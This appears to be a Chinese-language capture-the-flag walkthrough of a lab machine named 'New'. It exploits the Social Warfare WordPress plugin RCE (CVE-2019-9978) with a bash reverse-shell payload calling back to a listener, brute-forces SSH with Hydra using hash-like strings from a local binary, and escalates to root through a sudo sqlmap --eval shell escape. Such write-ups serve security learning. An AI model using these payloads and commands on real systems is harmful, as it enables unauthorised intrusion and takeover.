web打点

image-20250702082959738.png
image-20250702082959738.png

发现是wordpress 随便点几下跳转了http://new.dsz 改个hosts

wordpress的话就走正常流程,wpscan扫用户爆破密码先整上,发现没什么成果

image-20250702083232613.png
image-20250702083232613.png

发现用了Social Warfare v3.5.2插件,随便一搜就找到rce https://github.com/hash3liZer/CVE-2019-9978

┌──(root㉿kali)-[~]
└─# cat payload                    
<pre>system("/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.37/4444 0>&1'")</pre>
                                                                                                              ┌──(root㉿kali)-[~]
└─# python2 wp.py -t http://new.dsz --payload-uri http://192.168.1.37/payload
[>] Sending Payload to System!
┌──(root㉿kali)-[~]
└─# nc -lnvp 4444
listening on [any] 4444 ...
connect to [192.168.1.37] from (UNKNOWN) [192.168.1.36] 33860
bash: cannot set terminal process group (430): Inappropriate ioctl for device
bash: no job control in this shell
www-data@New:/var/www/new.dsz/wp-admin$

成功getshell

提权

www-data@New:/home$ cd /opt
cd /opt
www-data@New:/opt$ ls
ls
andeli_cred
www-data@New:/opt$

在opt下有个andeli_cred可执行文件,执行输出一堆类似md5的值,尝试用这些字符串去爆破andeli用户

┌──(root㉿kali)-[~]
└─# hydra -l andeli -P 1  ssh://192.168.1.36 -vV -f -t 10 
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-07-01 20:26:03
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 10 tasks per 1 server, overall 10 tasks, 10001 login tries (l:1/p:10001), ~1001 tries per task
[DATA] attacking ssh://192.168.1.36:22/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[INFO] Testing if password authentication is supported by ssh://andeli@192.168.1.36:22
[INFO] Successful, password authentication is supported by ssh://192.168.1.36:22
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "固定MD5插入位置: 665" - 1 of 10001 [child 0] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "eea0353df30b9b38f5f280db88912f91" - 2 of 10001 [child 1] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "e31195e88f31a699c9c499f129248b56" - 3 of 10001 [child 2] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "f788c604535faf9685a1ea30355b1a20" - 4 of 10001 [child 3] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "1a8d0816b7556ebe36f2022387e92093" - 5 of 10001 [child 4] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "a11b921496af55d8bdabfde74d06d9a8" - 6 of 10001 [child 5] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "ab33d487a26f748312e0fd84a8a724fc" - 7 of 10001 [child 6] (0/0)
............................
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "5cca227ce87f76ad1728abcfbb0dd792" - 658 of 10001 [child 6] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "35d57416c953f0007381e409006d700a" - 659 of 10001 [child 1] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "5dfd113da80981a0421272c7224a2448" - 660 of 10001 [child 6] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "145258ff008912955a7cc33f6798cd0d" - 661 of 10001 [child 9] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "1506df5efe700055ad170466cff8cf5e" - 662 of 10001 [child 2] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "55425a0487587ae27f984fe0ed8add82" - 663 of 10001 [child 9] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "3d4875cfc174c5635fb9ea9c7164ef61" - 664 of 10001 [child 2] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "cb93062c7903f67452d3c6f476855f71" - 665 of 10001 [child 7] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "9eeb22195b4eb7a35bcad0f45761eb7b" - 666 of 10001 [child 9] (0/0)
[22][ssh] host: 192.168.1.36   login: andeli   password: 9eeb22195b4eb7a35bcad0f45761eb7b

登录ssh,三板斧,找一下suid,没发现可利用的

看一下sudo -l

andeli@New:~$ find / -perm -4000 2>/dev/null
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/su
/usr/bin/umount
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/passwd
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/libexec/polkit-agent-helper-1
andeli@New:~$ sudo -l
Matching Defaults entries for andeli on New:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User andeli may run the following commands on New:
    (ALL) NOPASSWD: /usr/bin/sqlmap

可以用root执行sqlmap

andeli@New:~$ sudo sqlmap -u 127.0.0.1 --eval="import os; os.system('/bin/sh')"
        ___
       __H__                                                                                                                              
 ___ ___[)]_____ ___ ___  {1.5.2#stable}                                                                                                  
|_ -| . ["]     | .'| . |                                                                                                                 
|___|_  [,]_|_|_|__,|  _|                                                                                                                 
      |_|V...       |_|   http://sqlmap.org                                                                                               

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:43:51 /2025-07-01/

[20:43:51] [INFO] testing connection to the target URL
# id
uid=0(root) gid=0(root) groups=0(root)
#